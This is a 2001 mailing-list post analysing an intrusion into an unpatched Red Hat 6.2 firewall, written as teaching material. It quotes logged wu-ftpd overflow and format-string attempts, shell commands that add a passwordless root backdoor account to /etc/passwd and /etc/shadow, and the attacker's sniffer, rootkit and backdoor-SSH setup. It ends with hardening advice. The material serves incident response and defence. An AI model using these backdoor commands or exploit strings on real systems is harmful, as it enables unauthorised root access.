Security Incidents mailing list archives
RedHat 6.2 box exploited - analysis of attacker activity
From: Curt Wilson <netw3 () NETW3 COM>
Date: Sun, 4 Feb 2001 06:56:45 -0000
Curt Wilson, Netw3 Consulting 02/02/2001 This is my first analysis of a Linux box that has been rooted. This is intended to be somewhat of a teaching document, and does not assume a large degree of technical skill. If anyone sees any errors in here or has any comments, I'd be happy to hear from you at netw3 () netw3 com The box in question is an unpatched Red Hat Linux 6.2 machine running as an ipchains firewall and IP masquerade server. The attacker(s) main goal in system compromise seems to be for the purpose of setting up a BNC server that will allow connections to IRC networks and an IRC bot. Attacker also used the compromised linux system to search for other vulnerable systems running the Washington University FTP through the use of two exploits (wu-scan and muje) as well as the attempted or actual exploits of numerous remote systems through the statdx exploit. The statd exploit attacks the remote procedure call application rpc.statd and opens up an interactive root shell on TCP port 39168. (For more info on statdx, see paper by George Bakos at http://www.sans.org/y2k/practical/George_Bakos.html .) Intruder erased log directory /var/log which damaged numerous symlinks. A more careful attacker would have left this directory intact but edited the specific log files to erase their tracks. It is clear from system analysis that this person is whats known as a script kiddie and does not represent an advanced attacker. Intruder appears to have penetrated the system using an exploit that attacks WU-FTP. The default wu-ftp on Red Hat 6.2 (wu-2.6.0(1) in this case) is vulnerable and exploit code has been published on the Internet and has been in wide use amongst the cracker underground. Patches are available on the redhat website. Buffer overflow attacks on wu-ftp take place through a specially crafted password sequence that includes the spawning of /bin/sh. The IP addresses are most likely other compromised systems that the attackers are using to break into other sites and could be one of the sites that was used to crack this box. Logs of attacks in progress: 211.72.123.250 => external_ip_of_linux_system [21] LeLmNnNnUSER ftp NBnPASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 151.15.186.199 => external_ip_of_linux_system [21] Xv+R6-6- user ftp]-1pass 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11a- 3-a-aSITE EXEC %x %x %x %x +%x |%x 156.111.178.186 => external_ip_of_linux_system [21] EEUSER ftp QPASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 syr-24-95-165-70.twcny.rr.com => external_ip_of_linux_system [21] q-q-q-q-USER ftp q-%PASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 211.250.5.4 => external_ip_of_linux_system [21] FFUSER ftp pPASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 63.105.115.4 => external_ip_of_linux_system [21] L'L'0$L)^1L)^1USER ftp L)k1PASS 111F11CA? k^11^Ff'1^=11^C11^u1F^=0F1FvFNV110bin0sh1..11 The wu-ftp exploit probably allowed the attacker to bind /bin/sh with a TCP port. The attacker then telnets to the port and has interactive root access. Another method is that the exploit allows the execution of arbitrary code such as appending a username into the /etc/passwd and /etc/shadow files that is then used through the telnet port. Without detailed logs, its hard to know exactly what the attacker did since they cleaned up some other commonly exploited services when they first logged in to the system. Its possible that the attacker gained some other means of initial access but evidence suggests that these FTP exploits were the means. A Red Hat announcement about this problem can be found at http://www.redhat.com/support/errata/RHSA- 2000-039.html At some point, this attacker (or other attackers) placed a file in /bin/psr which adds a user named rewt with root level access and a user named mujixi to the /etc/passwd and /etc/shadow files: echo "rewt:x:0:0:root user,,,:/root:/bin/bash"
/etc/passwd
echo "mujixi:x:666:666:ala care da muje,,,:/tmp:/bin/bash" >>/etc/passwd echo "rewt::::::::" >>/etc/shadow echo "mujixi::::::::" >>/etc/shadow After obtaining root access, attacker modified multiple system files and scripts to cover their tracks: /etc/rc.d/rc.sysinit has been modified to run the following: /usr/sbin/sshd2 /usr/sbin/gpm.root /usr/sbin/gpm.root /usr/sbin/gpm.root appears to be controlled by a config file /etc/gpm-root.conf and contains the following commands: cd /usr/X11R6/include/X11/ This directory is invisible to the standard ls command, but will show up with an ls a to display all files. This is a common attacker trick. Most of attackers tools were placed in this directory. ./linsniffer > tcp.log & linsniffer captures login and passwords in an Ethernet environment. A switched network makes this attack more difficult /usr/sbin/sshd2 p 1983 Attacker runs an SSH server on port 1983. After exploiting the system for root access, the attacker appeared to add a username muje1 to the /etc/passwd and/or /etc/shadow files with a group ID of 501. Attacker also edited the /etc/ftpusers file, perhaps allowing more users to login through FTP than the original setting. Other suspicious user ids include muje and group IDs include 1018 and 1004. Next, attacker kills all instances of the lpd process. This is probably so others wont exploit his system through an lpd buffer overflow (never mind that lpd was not an open port from the outside, attacker wanted to secure his own access). Attacker also removed the portmapper startup file in /etc/rc.d/init.d/portmap which stopped the portmapper from listening on TCP port 111 (never mind that portmapper was not an open port from the outside). Attacker then cleans up by running updatedb and removing a package named srk.tar.gz (which might be a rootkit), and removing the home directories of users muje and muje1. The user appears to have replaced various system binaries such as netstat, ps, ifconfig, and top to cover their tracks. The replaced version of ps does not show activity such as the linsniffer, and the replaced version of ifconfig does now show the interface running in promiscuous mode. The other replaced binaries are most likely tailored to hide the attackers activities from administrators eyes. These replacements may have been done with srk.tar.gz. I was unable to find a published tool named srk but the rk suggests a rootkit. Please see http://packetstorm.securify.com/UNIX/penetration/root kits/ for a large selection of rootkits. The group ID 1018 appears to have ran the rootkit. The system binaries that were replaced by this activity are as follows: -rwxr-xr-x 1 1018 users 19840 Nov 25 1998 /sbin/ifconfig -rwxr-xr-x 1 1018 users 33280 Dec 27 1998 /bin/ps -rwxr-xr-x 1 1018 users 35300 Jan 2 1999 /bin/netstat -rwxr-xr-x 1 1018 users 53588 Jan 12 1999 /usr/bin/top -rwxr-xr-x 1 1018 users 13621 Dec 19 10:14 /bin/vobiscu (unfamiliar) The group ID 1004 created the following files of interest: [root@fortran /dev]# ls -al /dev/caca -rw-rw-r-- 1 root 501 117 Jan 13 21:01 /dev/caca [root@fortran /dev]# strings /dev/caca 1 193.226.125 1 193.230.192 1 194.102.218 1 193.231.249 3 31221 3 31337 3 89898 3 44113 3 31223 3 22546 3 666 4 6666 31337 is commonly used in the computer underground. Many Trojan horse applications listen on port 31337. It is a variation of the word elite. 666 is used by attackers, and port 6666 may refer to an IRC or BNC server. -rw-rw-r-- 1 root 501 97 Jan 13 21:01 /dev/dsx [root@fortran /netw3]# strings /dev/dsx | more 3 psybnc 3 wu-scan 3 muje 3 statdx 3 sl2 3 sshd2 3 linsniffer 3 smurf 3 slice 3 mech 3 muh 3 bnc /dev/dsx appears to be a listing of what the attacker has installed. -rw-rw-r-- 1 root 501 12288 Jan 13 21:01 /etc/psdevtab [root@fortran .ssh]# ls -al /root/.ssh total 16 drwxr-xr-x 2 root 501 4096 Jan 24 00:17 . drwxr-x--- 8 root root 4096 Feb 2 18:54 .. -rw------- 1 root root 663 Jan 28 20:41 known_hosts -rw------- 1 root 501 512 Jan 28 20:41 random_seed -rw-r--r-- 1 1004 users 307 Aug 31 1998 /usr/man/man6/ssh_config -rw------- 1 root 501 552 Jan 13 21:01 /usr/man/man6/ssh_host_key -rw-rw-r-- 1 root 501 356 Jan 13 21:01 /usr/man/man6/ssh_host_key.pub -rw------- 1 root 501 512 Feb 3 04:55 /usr/man/man6/ssh_random_seed -rw-r--r-- 1 1004 users 697 Dec 27 1998 /usr/man/man6/sshd_config /usr/man/man6 is also used by attacker(s) to store SSH key and configuration files. The following ports are open and listening on the local (192.168) interface of the system: 21 ftp # point of entry 22 ssh # activated by attacker 23 telnet 25 smtp 79 finger 98 linuxconf 113 auth 513 rlogin 514 rsh 515 lp 1983 ssh # activated by attacker The primary user that ran the BNC server appears to go by the name of bulangia or buLaneL or bulanel and a secondary user goes by the name of NINA16. There is evidence of multiple connections to Bulgaria and Italian IRC networks and remote systems. Some of the hosts that used the BNC server include 5dial86.xnet.ro and 11dial217.xnet.ro. Various IRC servers were visited by these users, and if further action was warranted, investigations could take place by connecting to the same IRC networks and attempting to track these people down. Attacker(s) also installed what appears to be an IRC bot going by the name of eddy or eddybot. The software package used to implement this bot was called emech-2.8 and the config file for e-mech reveals details such as an ircname of H-a-c-k T-h-e F-u-c-k-i-n-g P-l-a-n-e-t ! and channels such as #Linux_mafia. The linkpass and entityname are present in the config and users file, which could allow counterintelligence to be performed if desired. Recommendations: Apply patches to Red Hat systems running ipchains firewalls. Red Hat 6.2 has nearly 50 security patches. See http://www.redhat.com/support/errata/rh62- errata-security.html. Several accounts and passwords were obtained through the user of the linsniffer application. A switched environment can help reduce the risk of sniffing attacks. Lock down systems to provide defense in depth. Do not simply rely upon ipchains to block hostile traffic. Deny all traffic except what is specifically allowed. Comment out services in /etc/services that do not need to be ran (finger, etc) as well as in /etc/rc.d. If the FTP service will be used, make sure that /etc/ftpusers only allows specific usernames. If attacker pierces firewall mechanism, limit what is available by turning off everything that is not needed, leaving only those services that are truly necessary. Portsentry, which is running on the system, is a nice addition, but obviously did not help in this instance. Since the wu-ftp vulnerabilities are widely known, attacker would only have to find the existence of TCP port 21 with a banner that identified itself as a vulnerable version of wu-ftp. The use of TCP wrappers and ipchains to restrict access to ftpd would be helpful. Modify listening services banners to reflect false information to confuse attackers and automated exploit/scanning applications. Systems management should never be performed over an unencrypted connection such as telnet. Install SSH on the server and on your client systems and use it. This encrypts connections and makes it much harder for an attacker to obtain your login credentials. An intrusion detection system such as snort (www.snort.org) is inexpensive, easy to configure, and in wide use. Snort can monitor a network and alert a network manager (with the proper configuration) via pager or email that an attack is taking place. Tripwire is a file integrity monitor that can be used to take a snapshot of certain key system files ( such as ps, netstat, ifconfig, and many more). When these key system files are changed, an alert can be generated to notify that something suspicious is taking place. There are freeware/GPL options for SSH (openSSH) and a freeware tripwire clone available on the Internet (see www.whitehats.com for a large collection of open source security tools). Curt Wilson - Netw3 Consulting netw3 () netw3 com
Current thread:
- RedHat 6.2 box exploited - analysis of attacker activity Curt Wilson (Feb 04)
- Re: RedHat 6.2 box exploited - analysis of attacker activity Thomas Roessler (Feb 05)